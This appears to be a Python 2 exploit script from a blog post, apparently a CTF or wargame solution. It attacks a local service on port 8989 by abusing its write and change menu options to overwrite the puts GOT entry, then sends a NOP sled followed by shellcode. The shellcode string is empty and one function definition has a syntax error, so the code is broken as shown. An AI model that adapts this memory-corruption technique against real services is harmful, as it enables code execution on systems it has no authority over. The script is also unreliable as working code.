#!/usr/bin/python
from socket import *
from struct import *
p = lambda x : pack("<L",x)
up = lambda x : pack("<L",x)[0]
s = socket(AF_INET,SOCK_STREAM)
s.connect(('127.0.0.1',8989))
puts_got = 0x0804A008
shellcode = ""
nopsled = "\x90"*90
payload = nopsled+shellcode
def write(s,size)
s.send("1\n")
s.recv(1024)
s.send(size)
def change(s,num,size,data):
s.send("3\n")
s.recv(1024)
s.send(num)
s.recv(1024)
s.send(size)
s.recv(1024)
s.send(data)
def main():
print s.recv(2048) #start!
write(s,4)
s.recv(1024)
change(s,0,100,p(puts_got)*9)
s.recv(1024)
write(s,4)
s.recv(1024)
change(s,0,len(payload),payload)
s.recv(1024)
s.send("1\n")
if __name__=="__main__":
main()
CLEAR!
댓글 없음:
댓글 쓰기